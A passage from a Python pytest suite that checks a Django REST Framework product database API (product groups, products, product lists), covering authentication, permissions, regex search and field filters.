mixer.blend("productdb.ProductGroup", name="product group 1")
mixer.blend("productdb.ProductGroup", name="product group 2")
mixer.blend("productdb.ProductGroup", name="product group 3")
assert ProductGroup.objects.count() == 3
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCT_GROUP_COUNT)
assert response.status_code == status.HTTP_200_OK
assert response.json() == {'count': 3}
def test_search_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 5,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 5
},
"data": [
{
"vendor": 0,
"id": 0,
"name": "product group 0",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
{
"vendor": 0,
"id": 0,
"name": "product group 1",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
{
"vendor": 0,
"id": 0,
"name": "product group 2",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
{
"vendor": 0,
"id": 0,
"name": "product group 3",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
{
"vendor": 0,
"id": 0,
"name": "product group 4",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
}
]
}
for e in range(0, 5):
ProductGroup.objects.create(name="product group %d" % e)
client = APIClient()
client.login(**AUTH_USER)
# verify the use of regular expressions
response = client.get(REST_PRODUCT_GROUP_LIST + "?search=" + quote("^product group \d+$"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 5, "Should contain five elements"
# adjust pk values
for e in range(0, 5):
expected_result["data"][e]["id"] = ProductGroup.objects.get(name="product group %d" % e).id
expected_result["data"][e]["url"] = expected_result["data"][e]["url"] % expected_result["data"][e]["id"]
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_id_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"vendor": 0,
"id": 1,
"name": "TBD",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
]
}
pg = mixer.blend("productdb.ProductGroup", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = pg.id
expected_result["data"][0]["vendor"] = pg.vendor.id
expected_result["data"][0]["name"] = pg.name
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert ProductGroup.objects.count() == 1
client = APIClient()
client.login(**AUTH_USER)
# use ID field filter (exact match)
response = client.get(REST_PRODUCT_GROUP_LIST + "?id=%d" % pg.id)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_name_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"vendor": 0,
"id": 1,
"name": "",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
]
}
pg = mixer.blend("productdb.ProductGroup", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = pg.id
expected_result["data"][0]["vendor"] = pg.vendor.id
expected_result["data"][0]["name"] = pg.name
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert ProductGroup.objects.count() == 1
client = APIClient()
client.login(**AUTH_USER)
# use name field (exact match)
response = client.get(REST_PRODUCT_GROUP_LIST + "?name=" + quote(pg.name))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_vendor_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"vendor": 0,
"id": 1,
"name": "TBD",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
]
}
pg = mixer.blend("productdb.ProductGroup", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = pg.id
expected_result["data"][0]["vendor"] = pg.vendor.id
expected_result["data"][0]["name"] = pg.name
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert ProductGroup.objects.count() == 1
client = APIClient()
client.login(**AUTH_USER)
# use vendor field (startswith)
response = client.get(REST_PRODUCT_GROUP_LIST + "?vendor=" + quote("Cisco"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductAPIEndpoint:
"""Django REST Framework API endpoint tests for the Product model"""
today_string = DateFormat(datetime.now()).format(get_format(settings.SHORT_DATE_FORMAT))
def test_token_authentication(self, live_server):
token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
response = requests.get(live_server + REST_PRODUCT_LIST, headers={
"Authorization": "Token %s" % token.key
})
assert response.status_code == status.HTTP_200_OK, response.text
response = requests.get(live_server + REST_PRODUCT_LIST, headers={
"Authorization": "Token invalid_token"
})
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": "12.32",
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": self.today_string
}
]
}
p = mixer.blend("productdb.Product", list_price=12.32)
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % p.id
expected_result["data"][0]["product_id"] = p.product_id
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCT_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
assert jdata["pagination"]["total_records"] == 1, "unexpected result from API endpoint"
assert jdata == expected_result, "unexpected result from API endpoint"
# access first element of the list
response = client.get(jdata["data"][0]["url"])
assert response.status_code == status.HTTP_200_OK
assert jdata["data"][0] == response.json()
def test_add_access_with_permission(self):
test_user = "user"
test_product_id = "Test Product ID"
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"eol_reference_number": None,
"product_group": None,
"end_of_sale_date": None,
"description": "",
"vendor": 0,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": 0,
"product_id": test_product_id,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_product")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_product")
client = APIClient()
client.login(username=test_user, password=test_user)
# create with name
response = client.post(REST_PRODUCT_LIST, data={"product_id": test_product_id})
assert response.status_code == status.HTTP_201_CREATED, response.content.decode()
# adjust ID values from Database
expected_result["id"] = Product.objects.get(product_id=test_product_id).id
expected_result["url"] = "http://testserver/productdb/api/v1/products/%d/" % expected_result["id"]
assert response.json() == expected_result, "Should provide the new product"
def test_create_product_with_lc_state_sync_field(self):
test_user = "user"
test_product_id = "Test Product ID"
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"eol_reference_number": None,
"product_group": None,
"end_of_sale_date": None,
"description": "",
"vendor": 0,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": 0,
"product_id": test_product_id,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_product")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_product")
client = APIClient()
client.login(username=test_user, password=test_user)
# create with name
response = client.post(REST_PRODUCT_LIST, data={"product_id": test_product_id, "lc_state_sync": True})
assert response.status_code == status.HTTP_201_CREATED
# adjust ID values from Database
expected_result["id"] = Product.objects.get(product_id=test_product_id).id
expected_result["url"] = "http://testserver/productdb/api/v1/products/%d/" % expected_result["id"]
assert response.json() == expected_result, "Should provide the new product"
def test_change_lc_state_sync(self):
p = mixer.blend("productdb.Product", product_id="product ID")
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"eol_reference_number": None,
"product_group": None,
"end_of_sale_date": None,
"description": "",
"vendor": 0,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": 0,
"product_id": p.product_id,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
perm = Permission.objects.get(codename="change_product")
assert perm is not None
u.user_permissions.add(perm)
u.save()
assert u.has_perm("productdb.change_product")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCT_DETAIL % p.id, data={
"product_id": p.product_id,
"lc_state_sync": True
})
assert response.status_code == status.HTTP_200_OK
# adjust pk value
expected_result["id"] = Product.objects.get(product_id="product ID").id
expected_result["url"] = expected_result["url"] % expected_result["id"]
assert response.json() == expected_result
def test_change_access_with_permission(self):
p = mixer.blend("productdb.Product", product_id="product ID")
test_renamed_product = "renamed product"
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"eol_reference_number": None,
"product_group": None,
"end_of_sale_date": None,
"description": "",
"vendor": 0,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": 0,
"product_id": test_renamed_product,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
perm = Permission.objects.get(codename="change_product")
assert perm is not None
u.user_permissions.add(perm)
u.save()
assert u.has_perm("productdb.change_product")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCT_DETAIL % p.id, data={"product_id": test_renamed_product})
assert response.status_code == status.HTTP_200_OK
# adjust pk value
expected_result["id"] = Product.objects.get(product_id=test_renamed_product).id
expected_result["url"] = expected_result["url"] % expected_result["id"]
assert response.json() == expected_result
def test_change_product_group(self):
v1 = Vendor.objects.get(id=1)
v2 = Vendor.objects.get(id=2)
invalid_pg = mixer.blend("productdb.ProductGroup", name="invalid product group", vendor=v2)
valid_pg = mixer.blend("productdb.ProductGroup", name="valid product group", vendor=v1)
p = mixer.blend("productdb.Product", product_id="product ID", vendor=v1)
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/" % p.id,
"eol_reference_number": None,
"product_group": valid_pg.id,
"end_of_sale_date": None,
"description": "",
"vendor": v1.id,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": p.id,
"product_id": p.product_id,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
client = APIClient()
client.login(**SUPER_USER)
# try to associate the product to a product group of a different vendor
response = client.put(REST_PRODUCT_DETAIL % p.id, data={
"product_id": p.product_id,
"product_group": invalid_pg.id
})
assert response.status_code == status.HTTP_400_BAD_REQUEST
jdata = response.json()
assert len(jdata) == 1, "Should contain a single error message"
assert "product_group" in jdata
assert "Invalid product group, group and product must be associated to the same vendor" in str(jdata)
# try to associate the product to a product group of the same vendor
response = client.put(REST_PRODUCT_DETAIL % p.id, data={
"product_id": p.product_id,
"product_group": valid_pg.id
})
assert response.status_code == status.HTTP_200_OK
assert response.json() == expected_result
def test_delete_access_with_permission(self):
p = mixer.blend("productdb.Product")
assert Product.objects.count() == 1
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
perm = Permission.objects.get(codename="delete_product")
assert perm is not None
u.user_permissions.add(perm)
u.save()
assert u.has_perm("productdb.delete_product")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_PRODUCT_DETAIL % p.id)
assert response.status_code == status.HTTP_204_NO_CONTENT
assert Product.objects.count() == 0
def test_count_endpoint(self):
mixer.blend("productdb.Product", name="product 1")
mixer.blend("productdb.Product", name="product 2")
mixer.blend("productdb.Product", name="product 3")
assert Product.objects.count() == 3
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCT_COUNT)
assert response.status_code == status.HTTP_200_OK
assert response.json() == {'count': 3}
def test_search_field_by_product_id(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 2,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 2
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 21",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
},
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
for e in range(0, 5):
Product.objects.create(product_id="test product %d" % e)
for e in range(1, 3):
p = Product.objects.create(product_id="product 2%d" % e)
expected_result["data"][e-1]["id"] = p.id
expected_result["data"][e-1]["url"] = expected_result["data"][e-1]["url"] % p.id
client = APIClient()
client.login(**AUTH_USER)
# search by product ID (with regular expression
response = client.get(REST_PRODUCT_LIST + "?search=" + quote("^product \d+$"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == len(expected_result["data"]), \
"Should contain the same amount of elements as the expected result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_search_field_by_product_description(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 2,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 2
},
"data": [
{
"id": 0,
"list_price": None,
"description": "my search description",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 21",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
},
{
"id": 0,
"list_price": None,
"description": "other search description",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
for e in range(0, 5):
Product.objects.create(product_id="test product %d" % e, description=str(e))
for e in range(1, 3):
p = Product.objects.create(
product_id="product 2%d" % e,
description=expected_result["data"][e-1]["description"]
)
expected_result["data"][e-1]["id"] = p.id
expected_result["data"][e-1]["url"] = expected_result["data"][e-1]["url"] % p.id
client = APIClient()
client.login(**AUTH_USER)
# search by product ID (with regular expression
response = client.get(REST_PRODUCT_LIST + "?search=" + quote("^\w+ search description$"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == len(expected_result["data"]), \
"Should contain the same amount of elements as the expected result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_id_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
p = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["vendor"] = p.vendor.id
expected_result["data"][0]["product_id"] = p.product_id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert Product.objects.count() == 2
client = APIClient()
client.login(**AUTH_USER)
# use vendor field (startswith)
response = client.get(REST_PRODUCT_LIST + "?id=" + str(p.id))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_product_id_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
p = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["vendor"] = p.vendor.id
expected_result["data"][0]["product_id"] = p.product_id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert Product.objects.count() == 2
client = APIClient()
client.login(**AUTH_USER)
# use product_id (exact match)
response = client.get(REST_PRODUCT_LIST + "?product_id=" + quote(p.product_id))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
# use incomplete product_id
response = client.get(REST_PRODUCT_LIST + "?product_id=" + quote(p.product_id[:5]))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 0, "Should return no element"
def test_filter_vendor_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=2))
p = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["vendor"] = p.vendor.id
expected_result["data"][0]["product_id"] = p.product_id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert Product.objects.count() == 2
client = APIClient()
client.login(**AUTH_USER)
# use vendor field (startswith)
response = client.get(REST_PRODUCT_LIST + "?vendor=" + quote("Cisco"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_product_group_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
v1 = Vendor.objects.get(id=1)
v2 = Vendor.objects.get(id=2)
mixer.blend(
"productdb.Product",
vendor=v2,
product_group=mixer.blend("productdb.ProductGroup", vendor=v2)
)
pg = mixer.blend("productdb.ProductGroup", vendor=v1)
p = mixer.blend("productdb.Product", vendor=v1, product_group=pg)
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["vendor"] = p.vendor.id
expected_result["data"][0]["product_id"] = p.product_id
expected_result["data"][0]["product_group"] = pg.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert Product.objects.count() == 2
client = APIClient()
client.login(**AUTH_USER)
# use product_group field (exact match)
response = client.get(REST_PRODUCT_LIST + "?product_group=" + quote(pg.name))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
# use incomplete product_group field
response = client.get(REST_PRODUCT_LIST + "?product_group=" + quote(pg.name[:5]))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 0, "Should return no element"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductListAPIEndpoint:
"""Django REST framework API endpoint tests for the Product List model"""
TEST_PRODUCTS = [
"Product A",
"Product B",
"Product C",
"Product D",
"Product E"
]
TEST_PRODUCT_LIST_NAME = "Test Product List"
def create_test_data(self):
for e in self.TEST_PRODUCTS:
mixer.blend("productdb.Product", product_id=e)
def create_test_product_list(self):
self.create_test_data()
u = User.objects.get(username="pdb_admin")
pl = mixer.blend(
"productdb.ProductList",
name=self.TEST_PRODUCT_LIST_NAME,
description="<strong>Test Liste</strong>\nJust a test list",
string_product_list="\n".join(self.TEST_PRODUCTS),
update_user=u
)
return pl.id
def test_token_authentication(self, live_server):
token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
response = requests.get(live_server + REST_PRODUCTLIST_LIST, headers={
"Authorization": "Token %s" % token.key
})
assert response.status_code == status.HTTP_200_OK, response.text
response = requests.get(live_server + REST_PRODUCTLIST_LIST, headers={
"Authorization": "Token invalid_token"
})
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
self.create_test_data()
expected_result = {
"pagination": {
"page_records": 1,
"total_records": 1,
"url": {
"previous": None,
"next": None
},
"page": 1,
"last_page": 1
},
"data": [
{
"id": 0,
"name": "TestList",
"description": "<strong>Test Liste</strong>\nJust a test list",
"string_product_list": self.TEST_PRODUCTS,
"update_date": "",
"contact_email": "",
"url": "http://testserver/productdb/api/v1/productlists/%d/"
}
]
}
u = User.objects.get(username="api")
pl = mixer.blend(
"productdb.ProductList",
name=expected_result["data"][0]["name"],
description=expected_result["data"][0]["description"],
string_product_list="\n".join(expected_result["data"][0]["string_product_list"]),
update_user=u
)
expected_result["data"][0]["id"] = pl.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pl.id
expected_result["data"][0]["update_date"] = pl.update_date.strftime("%Y-%m-%d")
expected_result["data"][0]["contact_email"] = u.email
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCTLIST_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
assert jdata["pagination"]["total_records"] == 1, "unexpected result from API endpoint"
assert jdata == expected_result, "unexpected result from API endpoint"
# access first element of the list
response = client.get(jdata["data"][0]["url"])
assert response.status_code == status.HTTP_200_OK
assert jdata["data"][0] == response.json()
def test_add_access_with_permission(self):
"""add action through API for Product List not supported"""
self.create_test_data()
test_user = "user"
test_product_list_id = "Test Product List"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_productlist")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_productlist")
client = APIClient()
client.login(username=test_user, password=test_user)
# create with name
response = client.post(REST_PRODUCTLIST_LIST, data={"name": test_product_list_id})
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
assert response.json() == {'detail': 'Method "POST" not allowed.'}
assert ProductList.objects.count() == 0, "no product list was created"
def test_change_access_with_permission(self):
id = self.create_test_product_list()
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="change_productlist")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.change_productlist")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCTLIST_DETAIL % id, data={"name": "renamed product list"})
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "PUT" not allowed.'}
def test_delete_access_with_permission(self):
id = self.create_test_product_list()
test_user = "user"
